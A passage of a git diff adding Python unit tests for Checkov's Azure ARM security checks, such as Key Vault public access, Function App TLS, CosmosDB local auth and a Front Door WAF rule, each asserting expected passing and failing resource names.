+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_CognitiveServicesEnableLocalAuth.py b/tests/arm/checks/resource/test_CognitiveServicesEnableLocalAuth.py
new file mode 100644
index 00000000000..9c47dca9a0e
--- /dev/null
+++ b/tests/arm/checks/resource/test_CognitiveServicesEnableLocalAuth.py
@@ -0,0 +1,41 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.CognitiveServicesEnableLocalAuth import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestCognitiveServicesEnableLocalAuth(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_CognitiveServicesEnableLocalAuth"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.CognitiveServices/accounts.pass",
+        }
+        failing_resources = {
+            "Microsoft.CognitiveServices/accounts.fail",
+            "Microsoft.CognitiveServices/accounts.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_CosmosDBAccountsRestrictedAccess.py b/tests/arm/checks/resource/test_CosmosDBAccountsRestrictedAccess.py
new file mode 100644
index 00000000000..228b4265116
--- /dev/null
+++ b/tests/arm/checks/resource/test_CosmosDBAccountsRestrictedAccess.py
@@ -0,0 +1,45 @@
+import os
+import unittest
+
+from checkov.arm.checks.resource.CosmosDBAccountsRestrictedAccess import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestCosmosDBAccountsRestrictedAccess(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_CosmosDBAccountsRestrictedAccess"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.DocumentDB/databaseAccounts.pass",
+            "Microsoft.DocumentDB/databaseAccounts.pass2",
+            "Microsoft.DocumentDB/databaseAccounts.pass3",
+            "Microsoft.DocumentDB/databaseAccounts.pass4",
+        }
+        failing_resources = {
+            "Microsoft.DocumentDB/databaseAccounts.fail",
+            "Microsoft.DocumentDB/databaseAccounts.fail2",
+            "Microsoft.DocumentDB/databaseAccounts.fail3",
+            "Microsoft.DocumentDB/databaseAccounts.fail4",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary['passed'], 4)
+        self.assertEqual(summary['failed'], 4)
+        self.assertEqual(summary['skipped'], 0)
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_CosmosDBLocalAuthDisabled.py b/tests/arm/checks/resource/test_CosmosDBLocalAuthDisabled.py
new file mode 100644
index 00000000000..a64116e84a2
--- /dev/null
+++ b/tests/arm/checks/resource/test_CosmosDBLocalAuthDisabled.py
@@ -0,0 +1,41 @@
+import os
+import unittest
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.CosmosDBLocalAuthDisabled import check
+
+
+class TestCosmosDBLocalAuthDisabled(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_CosmosDBLocalAuthDisabled")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.DocumentDB/databaseAccounts.pass'
+        }
+        failing_resources = {
+            'Microsoft.DocumentDB/databaseAccounts.fail',
+            'Microsoft.DocumentDB/databaseAccounts.fail1'
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_DataExplorerUsesDiskEncryption.py b/tests/arm/checks/resource/test_DataExplorerUsesDiskEncryption.py
new file mode 100644
index 00000000000..fe6a51f5aff
--- /dev/null
+++ b/tests/arm/checks/resource/test_DataExplorerUsesDiskEncryption.py
@@ -0,0 +1,39 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.DataExplorerUsesDiskEncryption import check
+from checkov.arm.runner import Runner
+
+
+class TestDataExplorerUsesDiskEncryption(unittest.TestCase):
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+        test_files_dir = current_dir + "/example_DataExplorerUsesDiskEncryption"
+
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Kusto/clusters.pass",
+        }
+        failing_resources = {
+            "Microsoft.Kusto/clusters.fail",
+
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_DataFactoryNoPublicNetworkAccess.py b/tests/arm/checks/resource/test_DataFactoryNoPublicNetworkAccess.py
new file mode 100644
index 00000000000..bec68f84055
--- /dev/null
+++ b/tests/arm/checks/resource/test_DataFactoryNoPublicNetworkAccess.py
@@ -0,0 +1,43 @@
+import unittest
+from pathlib import Path
+from checkov.arm.checks.resource.DataFactoryNoPublicNetworkAccess import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestDataFactoryNoPublicNetworkAccess(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_DataFactoryNoPublicNetworkAccess"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.DataFactory/factories.pass",
+        }
+        print("\n",passing_resources)
+        failing_resources = {
+            "Microsoft.DataFactory/factories.fail1",
+            "Microsoft.DataFactory/factories.fail2",
+        }
+        print("\n",summary)
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+        print("\n",passed_check_resources)
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_DataLakeStoreEncryption.py b/tests/arm/checks/resource/test_DataLakeStoreEncryption.py
new file mode 100644
index 00000000000..20da6ce06bd
--- /dev/null
+++ b/tests/arm/checks/resource/test_DataLakeStoreEncryption.py
@@ -0,0 +1,43 @@
+import os
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.DataLakeStoreEncryption import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestDataLakeStoreEncryption(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_DataLakeStoreEncryption"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.DataLakeStore/accounts.pass",
+            "Microsoft.DataLakeStore/accounts.pass2",
+        }
+        failing_resources = {
+            "Microsoft.DataLakeStore/accounts.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py b/tests/arm/checks/resource/test_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py
new file mode 100644
index 00000000000..f760685abda
--- /dev/null
+++ b/tests/arm/checks/resource/test_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py
@@ -0,0 +1,26 @@
+import os
+import unittest
+
+from checkov.arm.checks.resource.DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestDatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        self.assertEqual(summary['passed'], 1)
+        self.assertEqual(summary['failed'], 2)
+        self.assertEqual(summary['skipped'], 0)
+        self.assertEqual(summary['parsing_errors'], 0)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_DatabricksWorkspaceDataPlaneToControlPlaneCommunicateOverPrivateLink.py b/tests/arm/checks/resource/test_DatabricksWorkspaceDataPlaneToControlPlaneCommunicateOverPrivateLink.py
new file mode 100644
index 00000000000..09ec78eba45
--- /dev/null
+++ b/tests/arm/checks/resource/test_DatabricksWorkspaceDataPlaneToControlPlaneCommunicateOverPrivateLink.py
@@ -0,0 +1,26 @@
+import os
+import unittest
+
+from checkov.arm.checks.resource.DatabricksWorkspaceIsNotPublic import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestDatabricksWorkspaceIsNotPublic(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_DatabricksWorkspaceIsNotPublic"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        self.assertEqual(summary['passed'], 2)
+        self.assertEqual(summary['failed'], 2)
+        self.assertEqual(summary['skipped'], 0)
+        self.assertEqual(summary['parsing_errors'], 0)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_EventHubNamespaceMinTLS12.py b/tests/arm/checks/resource/test_EventHubNamespaceMinTLS12.py
new file mode 100644
index 00000000000..b115db762cd
--- /dev/null
+++ b/tests/arm/checks/resource/test_EventHubNamespaceMinTLS12.py
@@ -0,0 +1,42 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.EventHubNamespaceMinTLS12 import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestEventHubNamespaceMinTLS12(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_EventHubNamespaceMinTLS12"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.EventHub/namespaces.pass",
+            "Microsoft.EventHub/namespaces.pass2",
+        }
+        failing_resources = {
+            "Microsoft.EventHub/namespaces.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_EventgridTopicIdentityProviderEnabled.py b/tests/arm/checks/resource/test_EventgridTopicIdentityProviderEnabled.py
new file mode 100644
index 00000000000..e82ec834c98
--- /dev/null
+++ b/tests/arm/checks/resource/test_EventgridTopicIdentityProviderEnabled.py
@@ -0,0 +1,40 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.EventgridTopicIdentityProviderEnabled import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestEventgridTopicIdentityProviderEnabled(unittest.TestCase):
+    def test_summery(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_EventgridTopicIdentityProviderEnabled"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.EventGrid/topics.pass",
+        }
+        failing_resources = {
+            "Microsoft.EventGrid/topics.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_EventgridTopicLocalAuthentication.py b/tests/arm/checks/resource/test_EventgridTopicLocalAuthentication.py
new file mode 100644
index 00000000000..9010a91ff20
--- /dev/null
+++ b/tests/arm/checks/resource/test_EventgridTopicLocalAuthentication.py
@@ -0,0 +1,41 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.EventgridTopicLocalAuthentication import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestEventgridTopicLocalAuthentication(unittest.TestCase):
+    def test_summery(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_EventgridTopicLocalAuthentication"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.EventGrid/topics.pass",
+        }
+        failing_resources = {
+            "Microsoft.EventGrid/topics.fail",
+            "Microsoft.EventGrid/topics.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_EventgridTopicNetworkAccess.py b/tests/arm/checks/resource/test_EventgridTopicNetworkAccess.py
new file mode 100644
index 00000000000..09ae3b2bb29
--- /dev/null
+++ b/tests/arm/checks/resource/test_EventgridTopicNetworkAccess.py
@@ -0,0 +1,41 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.EventgridTopicNetworkAccess import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestEventgridTopicNetworkAccess(unittest.TestCase):
+    def test_summery(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_EventgridTopicNetworkAccess"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.EventGrid/topics.pass",
+        }
+        failing_resources = {
+            "Microsoft.EventGrid/topics.fail",
+            "Microsoft.EventGrid/topics.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_FrontDoorWAFACLCVE202144228.py b/tests/arm/checks/resource/test_FrontDoorWAFACLCVE202144228.py
new file mode 100644
index 00000000000..c1e48db4d11
--- /dev/null
+++ b/tests/arm/checks/resource/test_FrontDoorWAFACLCVE202144228.py
@@ -0,0 +1,45 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.FrontDoorWAFACLCVE202144228 import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestFrontDoorWAFACLCVE202144228(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_FrontDoorWAFACLCVE202144228"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Network/frontdoorWebApplicationFirewallPolicies.pass1",
+            "Microsoft.Network/frontdoorWebApplicationFirewallPolicies.pass2",
+            "Microsoft.Network/frontdoorWebApplicationFirewallPolicies.pass3",
+            "Microsoft.Network/frontdoorWebApplicationFirewallPolicies.pass4",
+        }
+        failing_resources = {
+            "Microsoft.Network/frontdoorWebApplicationFirewallPolicies.fail1",
+            "Microsoft.Network/frontdoorWebApplicationFirewallPolicies.fail3",
+            "Microsoft.Network/frontdoorWebApplicationFirewallPolicies.fail4",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_FunctionAppDisallowCORS.py b/tests/arm/checks/resource/test_FunctionAppDisallowCORS.py
new file mode 100644
index 00000000000..93127cb1f91
--- /dev/null
+++ b/tests/arm/checks/resource/test_FunctionAppDisallowCORS.py
@@ -0,0 +1,42 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.FunctionAppDisallowCORS import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestFunctionAppDisallowCORS(unittest.TestCase):
+
+    def test_summery(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_FunctionAppDisallowCORS"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Web/sites.pass_with_cors",
+            "Microsoft.Web/sites.pass",
+        }
+
+        failing_resources = {
+            "Microsoft.Web/sites.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+if __name__ == '__main__':
+    unittest.main()
\ No newline at end of file
diff --git a/tests/arm/checks/resource/test_FunctionAppHttpVersionLatest.py b/tests/arm/checks/resource/test_FunctionAppHttpVersionLatest.py
new file mode 100644
index 00000000000..ae744f6845d
--- /dev/null
+++ b/tests/arm/checks/resource/test_FunctionAppHttpVersionLatest.py
@@ -0,0 +1,38 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.FunctionAppHttpVersionLatest import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestFunctionAppHttpVersionLatest(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_FunctionAppHttpVersionLatest"
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Web/sites/slots.pass",
+            "Microsoft.Web/sites.pass2",
+
+        }
+        failing_resources = {
+            "Microsoft.Web/sites/slots.fail",
+            "Microsoft.Web/sites.fail2"
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
diff --git a/tests/arm/checks/resource/test_FunctionAppMinTLSVersion.py b/tests/arm/checks/resource/test_FunctionAppMinTLSVersion.py
new file mode 100644
index 00000000000..8fb3007b04d
--- /dev/null
+++ b/tests/arm/checks/resource/test_FunctionAppMinTLSVersion.py
@@ -0,0 +1,44 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.FunctionAppMinTLSVersion import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestFunctionAppMinTLSVersion(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_FunctionAppMinTLSVersion"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Web/sites.pass",
+            "Microsoft.Web/sites.pass2",
+            "Microsoft.Web/sites/slots.pass3",
+            "Microsoft.Web/sites/slots.pass4",
+        }
+        failing_resources = {
+            "Microsoft.Web/sites.fail",
+            "Microsoft.Web/sites/slots.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_FunctionAppsAccessibleOverHttps.py b/tests/arm/checks/resource/test_FunctionAppsAccessibleOverHttps.py
new file mode 100644
index 00000000000..16e1ebe7c99
--- /dev/null
+++ b/tests/arm/checks/resource/test_FunctionAppsAccessibleOverHttps.py
@@ -0,0 +1,46 @@
+import os
+import unittest
+
+from checkov.arm.checks.resource.FunctionAppsAccessibleOverHttps import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestFunctionAppsAccessibleOverHttps(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_FunctionAppsAccessibleOverHttps"
+        report = runner.run(root_folder=test_files_dir,runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Web/sites/config.sites_config_pass",
+            "Microsoft.Web/sites/config.sites_config_pass1",
+            "Microsoft.Web/sites/slots.sites_pass",
+            "Microsoft.Web/sites.sites_pass",
+        }
+        failing_resources = {
+            "Microsoft.Web/sites/config.sites_config_fail",
+            "Microsoft.Web/sites/slots.sites_fail",
+            "Microsoft.Web/sites.sites_fail",
+            "Microsoft.Web/sites/slots.sites_fail1",
+            "Microsoft.Web/sites.sites_fail1",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_FunctionAppsEnableAuthentication.py b/tests/arm/checks/resource/test_FunctionAppsEnableAuthentication.py
new file mode 100644
index 00000000000..ef432884ff6
--- /dev/null
+++ b/tests/arm/checks/resource/test_FunctionAppsEnableAuthentication.py
@@ -0,0 +1,39 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.FunctionAppsEnableAuthentication import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestFunctionAppsEnableAuthentication(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_FunctionAppsEnableAuthentication"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Web/sites/config.pass",
+            "Microsoft.Web/sites/config.authsettingsV2"
+        }
+        failing_resources = {
+            "Microsoft.Web/sites/config.authsettingsV2",
+            "Microsoft.Web/sites/config.authsettingsV2"
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 2)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
\ No newline at end of file
diff --git a/tests/arm/checks/resource/test_KeyVaultDisablesPublicNetworkAccess.py b/tests/arm/checks/resource/test_KeyVaultDisablesPublicNetworkAccess.py
new file mode 100644
index 00000000000..49e421ca683
--- /dev/null
+++ b/tests/arm/checks/resource/test_KeyVaultDisablesPublicNetworkAccess.py
@@ -0,0 +1,48 @@
+import unittest
+from pathlib import Path
+from checkov.arm.checks.resource.KeyVaultDisablesPublicNetworkAccess import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestKeyVaultDisablesPublicNetworkAccess(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_KeyVaultDisablesPublicNetworkAccess"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+        print(f'\n{summary}')
+
+        passing_resources = {
+            "Microsoft.KeyVault/vaults.pass1",
+            "Microsoft.KeyVault/vaults.pass2",
+            "Microsoft.KeyVault/vaults.pass3",
+            "Microsoft.KeyVault/vaults.pass4",
+        }
+        failing_resources = {
+            "Microsoft.KeyVault/vaults.fail1",
+            "Microsoft.KeyVault/vaults.fail2",
+            "Microsoft.KeyVault/vaults.fail3",
+            "Microsoft.KeyVault/vaults.fail4",
+            "Microsoft.KeyVault/vaults.fail5",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
+    
\ No newline at end of file
diff --git a/tests/arm/checks/resource/test_KeyVaultEnablesPurgeProtection.py b/tests/arm/checks/resource/test_KeyVaultEnablesPurgeProtection.py
new file mode 100644
index 00000000000..300158ae3c0
--- /dev/null
